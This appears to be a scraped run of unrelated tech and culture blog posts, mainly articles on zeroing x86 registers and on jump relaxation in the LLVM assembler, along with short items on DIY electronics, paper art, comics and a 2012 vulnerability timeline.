How to Get Started with DIY Electronics Projects

We feature a lot of different DIY electronics projects on Lifehacker, but the barrier for entry might seem high at a glance. However, it’s not nearly as difficult as it looks. Here’s how to get started.

The Surprising Subtleties of Zeroing a Register

Zeroing out a CPU register seems like the simplest and most basic operation imaginable, but in fact x86 CPUs contain a surprising amount of special logic to make this operation run smoothly. The most obvious way of zeroing an x86 CPU register turns out to not be the best, and the alternative has some surprising characteristics.

The curious result of this investigation is a mathematical asymmetry where subtraction is, in some cases, faster than addition. This analysis was inspired by comments on Comparing Memory is Still Tricky.

Tabula rasa

The x86 instruction set does not have a special purpose instruction for zeroing a register. An obvious way of dealing with this would be to move a constant zero into the register, like this:

mov eax, 0

That works, and it is fast. Benchmarking this will typically show that it has a latency of one cycle – the result can be used in a subsequent instruction on the next cycle. Benchmarking will also show that this has a throughput of three-per-cycle. The Sandybridge documentation says that this is the maximum integer throughput possible, and yet we can do better.

It’s too big

The x86 instruction used to load a constant value such as zero into eax consists of a one-byte opcode (0xB8) and the constant to be loaded. The problem, in this scenario, is that eax is a 32-bit register, so the constant is 32-bits, so we end up with a five-byte instruction:

B8 00 00 00 00 mov eax, 0

Instruction size does not directly affect performance – you can create lots of benchmarks that will prove that it is harmless – but in most real programs the size of the code does have an effect on performance. The cost is extremely difficult to measure, but it appears that instruction-cache misses cost 10% or more of performance on many real programs. All else being equal, reducing instruction sizes will reduce i-cache misses, and therefore improve performance to some unknown degree.

Smaller alternatives

Many RISC architectures have a zero register in order to optimize this particular case, but x86 does not. The recommended alternative for years has been to use xor eax, eax. Any register exclusive ored with itself gives zero, and this instruction is just two bytes long:

33 C0 xor eax, eax

Careful micro-benchmarking will show that this instruction has the same one-cycle latency and three-per-cycle throughput of mov eax, 0 and it is 60% smaller (and recommended by Intel), so all is well.

Suspicious minds

If you really understand how CPUs work then you should be concerned with possible problems with using xor eax, eax to zero the eax register. One of the main limitations on CPU performance is data dependencies. While a Sandybridge processor can potentially execute three integer instructions on each cycle, in practice its performance tends to be lower because most instructions depend on the results of previous instructions, and are therefore serialized. The xor eax, eax instruction is at risk for such serialization because it uses eax as an input. Therefore it cannot (in theory) execute until the last instruction that wrote to eax completes. For example, consider this code fragment below:

1: add eax, 1

2: mov ebx, eax

3: xor eax, eax

4: add eax, ecx

Ideally we would like our awesome out-of-order processor to execute instructions 1 and 3 in parallel. There is a literal data dependency between them, but a sufficiently advanced processor could detect that this dependency is artificial. The result of the xor instruction doesn’t depend on the value of eax, it will always be zero.

It turns out that x86 processors have for many years handled xor of a register with itself specially. Every out-of-order Intel and AMD processor that I am aware of can detect that there is not really a data dependency and it can execute instructions 1 and 3 in parallel. Which is great. The CPUs use register renaming to ‘create’ a new eax for the sequence of instructions starting with instruction 3.

It gets better





On Sandybridge this gets even better. The register renamer detects certain instructions (xor reg, reg and sub reg, reg and various others) that always zero a register. In addition to realizing that these instructions do not really have data dependencies, the register renamer also knows how to execute these instructions – it can zero the registers itself. It doesn’t even bother sending the instructions to the execution engine, meaning that these instructions use zero execution resources, and have zero latency! See section 2.1.3.1 of Intel’s optimization manual where it talks about dependency breaking idioms. It turns out that the only thing faster than executing an instruction is not executing it.

Show us the measurements!

A full measurement of the performance of instructions on out-of-order processors is impractical, but I did come up with a micro-benchmark which can show this particular difference. The following eight instructions have no data dependencies between them so their performance is limited only by the integer throughput of the processor. By repeating this block of code many times (I found that seventy worked best) and carefully timing it I find that, as promised, my Sandybridge processor can execute three integer add instructions per cycle.

add r8, r8

add r9, r9

add r10, r10

add r11, r11

add r12, r12

add r13, r13

add r14, r14

add r15, r15

If I change the add opcode to sub or xor then the performance on many processors would be unchanged. But on Sandybridge the throughput increases to four instructions per cycle.

IPC of 2.9943 for independent adds

IPC of 3.9703 for independent subs

IPC of 3.9713 for independent xors

An even more dramatic result is found if you repeat “add r8, r8” hundreds of times. Because every instruction is dependent on the previous one this code executes at a rate of one instruction per cycle. However if you change it to “sub r8, r8” then the dependency is recognized as being spurious and the code executes at a rate of four instructions per cycle – a four times speedup from a seemingly trivial opcode change.

I haven’t figured out what is limiting performance to four instructions per cycle. It could be instruction decode or some other pathway in the processor which cannot sustain four instructions per cycle beyond short bursts. Whatever the limitation is it is unlikely to be relevant to normal code.

So there you have it – subtraction is faster than addition, as long as you are subtracting a number from itself.

64-bit versus 32-bit

The test code above runs as 64-bit code because the extra registers make it easier to have long runs of instructions with no data dependencies. The 64-bit instructions have different sizes (seven bytes for mov r8, 0 and three bytes for xor r8, r8) but this doesn’t affect the conclusions. Using the 32-bit forms for the extended registers (r8d instead of r8) gives the same code size and performance as using the 64-bit forms. In general 64-bit code is larger than 32-bit code, except when the extra registers, 64-bit registers, or cleaner ABI lead to smaller code. In general you shouldn’t expect a big performance change from using 64-bit code, but in some cases, such as Fractal eXtreme, there can be huge wins.

Update: January 7, 2013

Section 2.1.3.1 of the Intel optimization manual actually explains where the four instructions per cycle limitation comes from. It says that the renamer “moves up to four micro-ops every cycle from the micro-op queue to the out-of-order engine.”

A coworker pointed out how this zeroing feature of the renamer probably works. Most RISC architectures have a “zero register” which always reads as zero and cannot be written to. While the x86/x64 architectures do not have an architectural zero register it seems likely that the Sandybridge processor has a physical zero register. When the renamer detects one of these special instructions it just renames the architectural register to point at the zero register. This is supremely elegant because no register clearing is actually needed. It is in the nature of register renaming that every write to a register is preceded by a rename and therefore the CPU will naturally never attempt to write to this register. This theory also explains why the dependency breaking idiom instruction CMPEQ XMM1, XMM1 still has to be executed. This instruction sets all bits to one, and I guess the Sandybridge processor doesn’t have a one’s register.
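The zero-register theory can be made concrete with a toy model. This is only a sketch of the idea described above, not how any real renamer is built: the class name `ToyRenamer`, the 16-entry map and the ever-growing physical register file are all assumptions made for illustration.

```cpp
#include <array>
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical: physical register 0 is hard-wired to read as zero.
constexpr int kZeroPhys = 0;

// Toy model of register renaming with a physical zero register.
class ToyRenamer {
public:
    ToyRenamer() : phys_(1, 0) {
        map_.fill(kZeroPhys);  // every architectural register starts out reading zero
    }

    // "xor reg, reg" or "sub reg, reg": handled entirely in the renamer.
    // Nothing is executed and nothing is written; only the mapping changes.
    void zero_idiom(int arch_reg) {
        assert(arch_reg >= 0 && arch_reg < 16);
        map_[arch_reg] = kZeroPhys;
    }

    // Every ordinary write is preceded by a rename to a fresh physical register,
    // so the zero register is never the destination of a write.
    void write(int arch_reg, std::uint64_t value) {
        assert(arch_reg >= 0 && arch_reg < 16);
        phys_.push_back(value);
        map_[arch_reg] = static_cast<int>(phys_.size()) - 1;
        ++executed_;
    }

    std::uint64_t read(int arch_reg) const { return phys_[map_[arch_reg]]; }

    // Number of operations that actually needed an execution unit.
    int executed() const { return executed_; }

private:
    std::array<int, 16> map_;          // architectural -> physical mapping
    std::vector<std::uint64_t> phys_;  // physical register file (grows forever, for simplicity)
    int executed_ = 0;
};
```

In this model a `write` followed by `zero_idiom` on the same register leaves `executed()` at one: the zeroing costs a map update and nothing else, which is the behaviour the theory predicts.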

Variable Resistor with a Million Settings

Sam DeRose on Instructables writes:

Last week in my college physics lab we got to use these variable resistance ‘boxes’. They had two inputs and six dials, and could generate one million different resistances across the two inputs. I knew I had to have one, and why not make it myself? This tutorial demonstrates how to build one for yourself for pretty cheap.
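The "one million" figure follows if each of the six dials has ten positions, since 10^6 = 1,000,000. The sketch below assumes a conventional decade box, where each dial selects one decimal digit of the resistance in ohms; that layout and the function names are assumptions, not details taken from the tutorial.

```cpp
#include <array>
#include <cassert>

// Resistance in ohms selected by six decade dials, most significant dial first.
// Assumes each dial has positions 0-9 and contributes one decimal digit.
long decade_box_ohms(const std::array<int, 6>& dials) {
    long ohms = 0;
    for (int digit : dials) {
        assert(digit >= 0 && digit <= 9);
        ohms = ohms * 10 + digit;
    }
    return ohms;
}

// Number of distinct settings for a box with `dial_count` ten-position dials.
long setting_count(int dial_count) {
    long count = 1;
    for (int i = 0; i < dial_count; ++i) count *= 10;
    return count;
}
```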

Assembler relaxation

In this article I want to present a cool and little-known feature of assemblers called "relaxation". Relaxation is cool because it’s one of those things that are apparent in hindsight ("of course this should be done"), but is non-trivial to implement and has some interesting algorithms behind it. While relaxation is applicable to several CPU architectures and more than one kind of instruction, for this article I will focus on jumps for the Intel x86-64 architecture.

And just so the nomenclature is clear, an assembler is a tool that translates assembly language into machine code, and this process is also usually referred to as assembly. That’s it, we’re good to go.

An example

Consider this x86 assembly function (in GNU assembler syntax):

        .text
        .globl  foo
        .align  16, 0x90
        .type   foo, @function
foo:
        # Save used registers
        pushq   %rbp
        pushq   %r14
        pushq   %rbx

        movl    %edi, %ebx
        callq   bar                 # eax <- bar(num)
        movl    %eax, %r14d         # r14 <- bar(num)
        imull   $17, %ebx, %ebp     # ebp <- num * 17
        movl    %ebx, %edi
        callq   bar                 # eax <- bar(num)
        cmpl    %r14d, %ebp         # if !(t1 > bar(num))
        jle     .L_ELSE             # (*) jump to return num * bar(num)
        addl    %ebp, %eax          # eax <- compute t1 + bar(num)
        jmp     .L_RET              # (*) and jump to return it
.L_ELSE:
        imull   %ebx, %eax
.L_RET:
        # Restore used registers and return
        popq    %rbx
        popq    %r14
        popq    %rbp
        ret

It was created by compiling the following C program with gcc -S -O2, cleaning up the output and adding some comments:

extern int bar(int);

int foo(int num) {
    int t1 = num * 17;
    if (t1 > bar(num))
        return t1 + bar(num);
    return num * bar(num);
}

This is a completely arbitrary piece of code crafted for purposes of demonstration, so don’t look too much into it. With the comments added, the relation between this code and the assembly above should be obvious.

What we’re interested in here is the translation of the jumps in the assembly code above (marked with (*)) into machine code. This can be easily done by first assembling the file:

$ gcc -c test.s

And then looking at the machine code (the jumps are once again marked):

$ objdump -d test.o

test.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <foo>:
   0:   55                      push   %rbp
   1:   41 56                   push   %r14
   3:   53                      push   %rbx
   4:   89 fb                   mov    %edi,%ebx
   6:   e8 00 00 00 00          callq  b <foo+0xb>
   b:   41 89 c6                mov    %eax,%r14d
   e:   6b eb 11                imul   $0x11,%ebx,%ebp
  11:   89 df                   mov    %ebx,%edi
  13:   e8 00 00 00 00          callq  18 <foo+0x18>
  18:   44 39 f5                cmp    %r14d,%ebp
  1b:   7e 04                   jle    21 <foo+0x21>     (*)
  1d:   01 e8                   add    %ebp,%eax
  1f:   eb 03                   jmp    24 <foo+0x24>     (*)
  21:   0f af c3                imul   %ebx,%eax
  24:   5b                      pop    %rbx
  25:   41 5e                   pop    %r14
  27:   5d                      pop    %rbp
  28:   c3                      retq

Note the instructions used for the jumps. For the JLE, the opcode is 0x7e, which means "jump if less-or-equal with an 8-bit PC-relative offset". The offset is 0x04, which is relative to the address of the next instruction (0x1d) and so lands on 0x21, the expected place. Similarly for the JMP, the opcode 0xeb means "jump with an 8-bit PC-relative offset".
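To check the arithmetic, here is a small sketch of how the target of such a short jump can be computed from the disassembly. The function name is made up for illustration; the only facts it relies on are that the short forms are two bytes long and that the offset is a signed byte counted from the end of the instruction.

```cpp
#include <cassert>
#include <cstdint>

// Target of a 2-byte short jump (opcode + rel8) located at `address`.
// The offset byte is signed and relative to the address of the next instruction.
std::uint64_t short_jump_target(std::uint64_t address, std::uint8_t offset_byte) {
    const std::int8_t rel8 = static_cast<std::int8_t>(offset_byte);
    return address + 2 + static_cast<std::int64_t>(rel8);
}
```

Feeding it the two marked instructions, `short_jump_target(0x1b, 0x04)` gives 0x21 and `short_jump_target(0x1f, 0x03)` gives 0x24, matching the targets objdump prints.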

Here comes the crux. 8-bit PC-relative offsets are enough to reach the destinations of the jumps in this example, but what if they weren’t? This is where relaxation comes into play.

Relaxation

Relaxation is the process in which the assembler replaces certain instructions with other instructions, or picks certain encodings for instructions, so that it can successfully assemble the machine code.

To see this in action, let’s continue with our example, adding a twist that will make the assembler’s life harder. Let’s make sure that the targets of the jumps are too far to reach with an 8-bit PC-relative offset:

[... same as before]
        jle     .L_ELSE             # jump to return num * bar(num)
        addl    %ebp, %eax          # eax <- compute t1 + bar(num)
        jmp     .L_RET              # and jump to return it
        .fill   130, 1, 0x90        # ++ added
.L_ELSE:
        imull   %ebx, %eax
.L_RET:
[... same as before]

This is an excerpt of the assembly code with a directive added to insert a long stretch of NOPs between the jumps and their targets. The stretch is long enough so that the targets are more than 128 bytes away from the jumps referring to them [1].

When this code is assembled, here’s what we get from objdump when looking at the resulting machine code:

[... same as before]
  1b:   0f 8e 89 00 00 00       jle    aa <foo+0xaa>
  21:   01 e8                   add    %ebp,%eax
  23:   e9 85 00 00 00          jmpq   ad <foo+0xad>
  28:   90                      nop
  29:   90                      nop
[... many more NOPs]
  a8:   90                      nop
  a9:   90                      nop
  aa:   0f af c3                imul   %ebx,%eax
  ad:   5b                      pop    %rbx
  ae:   41 5e                   pop    %r14
  b0:   5d                      pop    %rbp
  b1:   c3                      retq

The jumps were now translated to different instruction opcodes. JLE uses 0x0f 0x8e, which has a 32-bit PC-relative offset. JMP uses 0xe9, which has a similar operand. These instructions have a much larger range that can now reach their targets, but they are less efficient. Since they are longer, the CPU has to read more data from memory in order to execute them. In addition, they make the code larger, which can also have a negative impact because instruction caching is very important for performance [2].
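The same check works for the long forms, with two differences: the displacement is four bytes stored little-endian, and the instruction length depends on the opcode. The sketch below uses hypothetical helper names and takes the length as a parameter (5 for the 0xe9 JMP, 6 for the 0x0f 0x8e JLE seen above).

```cpp
#include <array>
#include <cassert>
#include <cstdint>

// Reassemble a little-endian 32-bit displacement from the four bytes of the encoding.
std::int32_t read_rel32(const std::array<std::uint8_t, 4>& b) {
    const std::uint32_t raw = static_cast<std::uint32_t>(b[0]) |
                              (static_cast<std::uint32_t>(b[1]) << 8) |
                              (static_cast<std::uint32_t>(b[2]) << 16) |
                              (static_cast<std::uint32_t>(b[3]) << 24);
    return static_cast<std::int32_t>(raw);
}

// Target of a near jump: address of the next instruction plus the signed displacement.
// `length` is the full instruction size: 5 for JMP (e9), 6 for JLE (0f 8e).
std::uint64_t near_jump_target(std::uint64_t address, unsigned length,
                               const std::array<std::uint8_t, 4>& disp) {
    assert(length == 5 || length == 6);
    return address + length + static_cast<std::int64_t>(read_rel32(disp));
}
```

For the JLE at 0x1b with displacement bytes 89 00 00 00 this yields 0xaa, and for the JMP at 0x23 with 85 00 00 00 it yields 0xad, as in the listing.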

Iterating relaxation

From this point on I’m going to discuss some aspects of implementing relaxation in an assembler. Specifically, the LLVM assembler. Clang/LLVM has been usable as an industrial-strength compiler for some time now, and its assembler (based on the MC module) is an integral part of the compilation process. The assembler can be invoked directly either by calling the llvm-mc tool, or through the clang driver (similarly to the gcc driver). My description here applies to LLVM version 3.2 or thereabouts.

To better understand the challenges involved in performing relaxation, here is a more interesting example. Consider this assembly code [3]:

        .text
        jmp     AAA
        jmp     BBB
        .fill   124, 1, 0x90        # FILL_TO_AAA
AAA:
        .fill   1, 1, 0x90          # FILL_TO_BBB
BBB:
        ret

Since by now we know that the short form of JMP (the one with an 8-bit immediate) is 2 bytes long, it’s clear that it suffices for both JMP instructions, and no relaxation will be performed.

   0:   eb 7e                   jmp    80 <AAA>
   2:   eb 7d                   jmp    81 <BBB>
[... many NOPs]
0000000000000080 <AAA>:
  80:   90                      nop
0000000000000081 <BBB>:
  81:   c3                      retq

If we increase FILL_TO_BBB to 4, however, an interesting thing happens. Although AAA is still in the range of the first jump, BBB will no longer be in the range of the second. This means that the second jump will be relaxed. But this will make it 5, instead of 2 bytes long. This event, in turn, will cause AAA to become too far from the first jump, which will have to be relaxed as well.

To solve this problem, the relaxation implemented in LLVM uses an iterative algorithm. The layout is performed multiple times as long as changes still happen. If a relaxation caused some instruction encoding to change, it means that other instructions may have become invalid (just as the example shows). So relaxation will be performed again, until its run doesn’t change anything. At that point we can confidently say that all offsets are valid and no more relaxation is needed.

The output is then as expected:

0000000000000000 <AAA-0x86>:
   0:   e9 81 00 00 00          jmpq   86 <AAA>
   5:   e9 80 00 00 00          jmpq   8a <BBB>
[... many NOPs]
0000000000000086 <AAA>:
  86:   90                      nop
  87:   90                      nop
  88:   90                      nop
  89:   90                      nop
000000000000008a <BBB>:
  8a:   c3                      retq

Contrary to the first example in this article, here relaxation needed two iterations over the text section to finish, due to the reason presented above.
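The iterate-until-stable idea is easy to reproduce in a toy model. The following is a minimal sketch, not LLVM's code: the `Item`, `Layout`, `relax` and `example` names are invented here, only unconditional jumps are modelled (2 bytes short, 5 bytes long), and each pass lays out the whole section before checking every short jump.

```cpp
#include <cassert>
#include <cstddef>
#include <map>
#include <string>
#include <vector>

// One entry of a toy text section: a jump, a run of filler bytes, or a label.
struct Item {
    enum Kind { Jump, Fill, Label } kind;
    std::string name;  // jump target or label name (unused for Fill)
    int size;          // bytes occupied; 0 for labels
};

constexpr int kShortJump = 2;  // eb rel8
constexpr int kLongJump = 5;   // e9 rel32

struct Layout {
    std::map<std::string, int> labels;  // final label addresses
    int relaxing_passes;                // passes that had to grow at least one jump
};

Layout relax(std::vector<Item>& items) {
    Layout result{{}, 0};
    for (;;) {
        // Layout step: assign addresses using the current instruction sizes.
        result.labels.clear();
        std::vector<int> address(items.size());
        int pc = 0;
        for (std::size_t i = 0; i < items.size(); ++i) {
            address[i] = pc;
            if (items[i].kind == Item::Label) result.labels[items[i].name] = pc;
            pc += items[i].size;
        }
        // Relaxation step: grow every short jump whose target is out of rel8 range.
        bool changed = false;
        for (std::size_t i = 0; i < items.size(); ++i) {
            if (items[i].kind != Item::Jump || items[i].size != kShortJump) continue;
            const int offset = result.labels.at(items[i].name) - (address[i] + kShortJump);
            if (offset < -128 || offset > 127) {
                items[i].size = kLongJump;
                changed = true;
            }
        }
        if (!changed) return result;  // stable: every offset is valid
        ++result.relaxing_passes;
    }
}

// The AAA/BBB example from the text, parameterised on FILL_TO_BBB.
std::vector<Item> example(int fill_to_bbb) {
    return {
        {Item::Jump, "AAA", kShortJump}, {Item::Jump, "BBB", kShortJump},
        {Item::Fill, "", 124},           {Item::Label, "AAA", 0},
        {Item::Fill, "", fill_to_bbb},   {Item::Label, "BBB", 0},
        {Item::Fill, "", 1},  // stands in for the 1-byte ret
    };
}
```

With `example(1)` nothing is relaxed and the labels land at 0x80 and 0x81. With `example(4)` the first pass grows only the second jump, the second pass grows the first, and a final pass confirms nothing else changed, leaving AAA at 0x86 and BBB at 0x8a.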

Laying-out fragments

Another interesting feature of LLVM’s relaxation implementation is the way object file layout is done to support relaxation efficiently.

In its final form, the object file consists of sections – chunks of data. Much of this data is encoded instructions, which is the kind we’re most interested in here because relaxation only applies to instructions. The most common way to represent chunks of data in programming is usually with some kind of byte arrays [4]. This representation, however, would not work very well for representing machine code sections with relaxable instructions. Let’s see why:

Suppose this is a text section with several instructions (marked by line boundaries). The instructions were encoded into a byte array and now relaxation should happen. The instruction painted purple requires relaxation, growing by a few bytes. What happens next?

Essentially, the byte array holding the instruction has to be re-allocated because it has to grow larger. Since the number of instructions needing relaxation may be non-trivial, a lot of time may be spent on such re-allocations, which tend to be very expensive. In addition, it’s not easy to avoid multiple re-allocations due to the iterative nature of the relaxation algorithm.

A solution that immediately springs to mind in light of this problem is to keep the instructions in some kind of linked list, instead of a contiguous array. This way, an instruction being relaxed only means the re-allocation of the small array it was encoded into, but not of the whole section. LLVM MC takes a somewhat more clever approach, by recognizing that a lot of data in the array won’t change once initially encoded. Therefore, it can be lumped together, leaving only the relaxable instructions separate. In MC nomenclature, these lumps are called "fragments".

So, the assembly emission process in LLVM MC has three distinct steps:

- Assembly directives and instructions are parsed, encoded and collected into fragments. Data and instructions that don’t need relaxation are placed into contiguous "data" fragments, while instructions that may need relaxation are placed into "instruction" fragments [5]. Fragments are linked together in a list.

- Layout is performed. Layout is the process wherein the offsets of all fragments in a section are computed and relaxation is performed (iteratively). If some instruction gets relaxed, all that’s required is to update the offsets of the subsequent fragments – no re-allocations.

- Finally, fragments are written into a single linear buffer for object-file emission (either into memory or into a file). At this step, all instructions have final sizes so it’s safe to put them consecutively into a byte array.
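The three steps above can be sketched with a few lines of code. This is a simplified illustration under my own naming (`Fragment`, `Section`, `layout`, `relax_jump`, `emit`), not MC's actual classes; in particular the relaxed jump's displacement is left as zeros rather than being patched.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <list>
#include <vector>

// A fragment is either a lump of fixed bytes or a single relaxable instruction.
struct Fragment {
    bool relaxable;
    std::vector<std::uint8_t> bytes;  // current encoding
    std::size_t offset;               // assigned by layout()
};

// Step 1 collects fragments into a linked list.
using Section = std::list<Fragment>;

// Step 2: compute the offset of every fragment; returns the section size.
std::size_t layout(Section& section) {
    std::size_t offset = 0;
    for (Fragment& f : section) {
        f.offset = offset;
        offset += f.bytes.size();
    }
    return offset;
}

// Relaxing touches only the small buffer of one fragment (short jmp -> long jmp).
void relax_jump(Fragment& f) {
    assert(f.relaxable && f.bytes.size() == 2 && f.bytes[0] == 0xeb);
    f.bytes = {0xe9, 0, 0, 0, 0};  // displacement would be patched after final layout
}

// Step 3: sizes are final, so the fragments can be copied into one linear buffer.
std::vector<std::uint8_t> emit(const Section& section) {
    std::vector<std::uint8_t> out;
    for (const Fragment& f : section) {
        out.insert(out.end(), f.bytes.begin(), f.bytes.end());
    }
    return out;
}
```

The point of the design shows up when `relax_jump` is followed by another `layout` call: the data fragments on either side are never copied or resized, only their offsets change.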

Interaction with the compiler

So far I’ve focused on the assembly part of the compilation process. But what about the compiler that emits these instructions in the first place? Once again, this interaction is highly dependent on the implementation, and I will focus on LLVM.

The LLVM code generator doesn’t yet know the addresses instructions and labels will land on (this is the task of the assembler), so it emits only the short versions for x86-64 jumps, relying on the assembler to do relaxation for those instructions that don’t have a sufficient range. This ensures that the number of relaxed instructions is as small as absolutely necessary.

While the relaxation process is not free, it’s a worthwhile optimization since it makes the code smaller and faster. Without this step, the compiler would have to assume no jump is close enough to its target and emit the long versions, which would make the generated code less than optimal.

Compiler writers usually prefer to sacrifice compilation time for the efficiency of the resulting code. However, as different tradeoffs sometimes matter for programmers, this can be configured with compiler flags. For example, when compiling with -O0, the LLVM assembler simply relaxes all jumps it encounters on first sight. This allows it to put all instructions immediately into data fragments, which ensures there are far fewer fragments overall, so the assembly process is faster and consumes less memory.

Conclusion

The main goal of this article was to document relaxation – an important feature of assemblers which doesn’t have too much written about it online. As a bonus, some high-level documentation of the way relaxation is implemented in the LLVM assembler (MC module) was provided. I hope it provides enough background to dive into the relevant sections of code inside MC and understand the smaller details.

| [1] | The PC-relative offset is signed, making its range +/- 7 bits, that is -128 to +127 bytes from the end of the jump instruction. |

| [2] | Incidentally, these instructions also have variations that accept 16-bit PC-relative immediates, but these are only available in 32-bit mode, while I’m building and running the programs in 64-bit mode. |

| [3] | In which I give up all attempts to resemble something generated from a real program, leaving just the bare essentials required to present the issue. |

| [4] | LLVM, like any self-respecting C++ project has its own abstraction for this called SmallVector, that heaps a few layers of full-of-template-goodness classes on top; yet it’s still an array of bytes underneath. |

| [5] | Reality is somewhat more complex, and MC has special fragments for alignment and data fill assembly directives, but for the sake of this discussion I’ll just focus on data and instruction fragments. In addition, I have to admit that "instruction" fragments have a misleading name (since data fragments also contain encoded instructions). Perhaps "relaxable fragment" would be more self-describing. Update: I’ve renamed this fragment to MCRelaxableFragment in LLVM trunk. |

Intricately Folded Geometric Paper Sculptures

It's always a treat when artists like Matt Shlian are able to incorporate their passion for science and math into their art. His interest in abstract geometric forms clearly influences his work though the paper engineer insists that he finds inspiration for his paper art from everything in life. He says, "I have a unique way of misunderstanding the world that helps me see things easily overlooked."

Shlian folds and sculpts a variety of paper-based materials, most commonly using acid-free paper, to construct each of his intricate pieces. As involved as they appear to be, one would assume that there's a great deal of preparation put into assembling each sculpture, but the artist admits that it is an unpredictable process. "I begin with a system of folding and at a particular moment the material takes over. Guided by wonder, my work is made because I cannot visualize its final realization; in this way I come to understanding through curiosity," he says.

"Often I start without a clear goal in mind, working within a series of limitations. For example on one piece I'll only use curved folds, or make my lines this length or that angle etc. Other times I begin with an idea for movement and try to achieve that shape or form somehow. Along the way something usually goes wrong and a mistake becomes more interesting than the original idea and I work with that instead. I'd say my starting point is curiosity; I have to make the work in order to understand it. If I can completely visualize my final result I have no reason to make it- I need to be surprised."

Matt Shlian website

via [My Amp Goes to 11]

A really, really tiny tube amp

After building his first tube amp from a kit, [Jarek] set to work on his next amp build. Since tube amps are a much more experimental endeavor than their solid state brethren, he decided to make his next amp unique with military surplus subminiature tubes, and in the process created the smallest tube amp we’ve ever seen.

Instead of the bulky 12AX7 and EL34 tubes usually found in tube amp builds, [Jarek] stumbled upon the subminiature dual triode 6021 tube, originally designed for ballistic missiles, military avionics, and most likely some equipment still classified to this day. These tubes not only reduced the size of the circuit; compared to larger amps, this tiny amplifier sips power.

The 100+ Volts required to get the tubes working is provided by a switched mode power supply, again keeping the size of the final project down. The results are awesome, as heard in the video after the break. There’s still a little hum coming from the amp, but this really is a fabulous piece of work made even more awesome through the use of very tiny tubes.















Barrel of Monkeys

Bill Kartalopoulos' new publishing venture Rebus Books (website / tumblr) has just launched with Barrel of Monkeys by Ruppert & Mulot. Winner of the Prix Révélation at the Festival International de la Bande Dessinée d'Angoulême. The first book of comics in English by Florent Ruppert and Jérôme Mulot, easily among the most important cartoonists to emerge in a generation. This translated edition has been hand-lettered by Jérôme Mulot for maximum fidelity. Strong, innovative, provocative work. See the preview video.

Here's a random selection of images from the book — the book you need to buy immediately so we can get more books from Ruppert & Mulot and Rebus:

click through for animated phenakistoscopes!

Phenakistoscope mania, watch it:

LE PETIT THÉÂTRE DE L'ÉBRIÉTÉ

And here are some other images by Ruppert & Mulot:

decoupe

les dents

more

An absurdly clever thermal imaging camera

Thermal imaging cameras, cameras able to measure the temperature of an object while taking a picture, are amazingly expensive. For the price of a new car, you can pick up one of these infrared cameras and check out where the drafts are in your house. [Max Justicz] thought he could do better than even professional-level thermal imaging cameras and came up with an absurdly clever DIY infrared camera.

While thermal imaging cameras – even inexpensive homebrew ones - have an infrared sensor that works a lot like a camera CCD, there is a cheaper alternative. Non-contact infrared thermometers can be had for $20, the only downside being they measure a single point and not multiple areas like their more expensive brethren. [Max] had the idea of using one of these thermometers along with a few RGB LEDs to paint different colors of light around a scene in response to the temperature detected by an infrared thermometer sensor.

To turn his idea into a usable tool, [Max] picked up an LED flashlight and saved the existing LED array for another day. After stuffing the guts of the flashlight with a few RGB LEDs, he added the infrared thermometer sensor and an Arduino to change the color of the LED in response to the temperature given by the sensor.

After that, it’s a simple matter of light painting. [Max] took a camera, left the shutter open, and used his RGB thermometer flashlight to paint a scene with multicolor LEDs representing the temperature sensed by the infrared thermometer. It’s an amazingly clever hack, and an implementation so simple we’re surprised we haven’t seen it before.
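The heart of a build like this is the mapping from a temperature reading to an LED color. We don't know what mapping [Max] chose; the sketch below is one plausible version, assuming a linear blend from blue (cold) to red (hot) between two user-chosen limits. The `Rgb` struct, the function name and the limits are all hypothetical.

```cpp
#include <algorithm>
#include <cassert>
#include <cstdint>

struct Rgb {
    std::uint8_t r, g, b;
};

// Map a temperature to a color: pure blue at or below cold_c, pure red at or
// above hot_c, and a linear blend in between.
Rgb temperature_to_rgb(double temp_c, double cold_c, double hot_c) {
    assert(hot_c > cold_c);
    // Normalise to 0..1 and clamp readings outside the chosen range.
    const double t = std::min(1.0, std::max(0.0, (temp_c - cold_c) / (hot_c - cold_c)));
    const std::uint8_t red = static_cast<std::uint8_t>(255.0 * t + 0.5);
    return Rgb{red, 0, static_cast<std::uint8_t>(255 - red)};
}
```

On an Arduino the three channel values would then be written to the PWM pins driving the RGB LEDs, with the limits picked to bracket the temperatures expected in the scene.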

Primeiro LP

Year 2012 Main Exploitable Vulnerabilities Interactive Timeline

You can find, by clicking on the following image, a visualization timeline of the main exploitable vulnerabilities of year 2012.

The start date of a slide corresponds to:

- the date of discovery of the vulnerability, or

- the date of report to the vendor, or

- the date of public release of the vulnerability

The end date of a slide corresponds to:

- the date of vendor security alert notification, or

- the date of Metasploit integration, or

- the date of fix, or

- the date of PoC disclosure

I recommend reading these related posts:

- KaiXin Exploit Kit Evolutions

- Microsoft Release Security Advisory MSA-2794220 for CFE Internet Explorer 0day

- Capstone Turbine Corporation Also Targeted in the CFR Watering Hole Attack And More

- Microsoft Internet Explorer CButton Vulnerability Metasploit Demo

- Forgotten Watering Hole Attacks On Space Foundation and RSF Chinese

- Attack and IE 0day Informations Used Against Council on Foreign Relations

- Microsoft December 2012 Patch Tuesday Review

- CVE-2012-4681 Vulnerability Patched in Out-of-Band Oracle Java Update

- Adobe August 2012 Patch Tuesday Review

- Oracle Java Critical Patch Update October 2012 Review

LLVM 3.2 released

2012 Year in Pictures: Part II

Tightrope walker Nik Wallenda walks the high wire from the United States side to the Canadian side over the Horseshoe Falls in Niagara Falls, Ontario, on June 15. (Mark Blinch/Reuters)

Game Developer Magazine Floating Point

This is for references, code examples, and discussion regarding the floating-point article in the October 2012 Game Developer Magazine.

Years ago I wrote an article on comparing floating-point numbers that became unexpectedly popular – despite numerous flaws. As an act of penance for its imperfect advice I wrote a series of blog posts discussing floating-point math. I then wrote a Game Developer Magazine article to summarize the most important points.

The entire series of posts can be found here: http://randomascii.wordpress.com/category/floating-point/

Specific articles relevant to the Game Developer Magazine article include:

- Stupid float tricks – the format of floating-point numbers

- Comparing floats – techniques for comparing floating-point numbers, plus discussion of precision problems

- Don’t store that in a float – a plea to not store elapsed game time in a float

- Exceptional floating point – using floating-point exceptions to find bugs

- Round-tripping of floats – how many digits should you use when printing floats?

- Testing the printing and scanning of all floats

- Intermediate precision – the complex and variable rules regarding expression evaluation, and their effect on performance and results

No floating-point article would be complete without a reference to David Goldberg’s classic article “What Every Computer Scientist Should Know About Floating-Point Arithmetic”. It was written in a time when the IEEE floating-point math standard was not yet universal, but it still contains important insights.

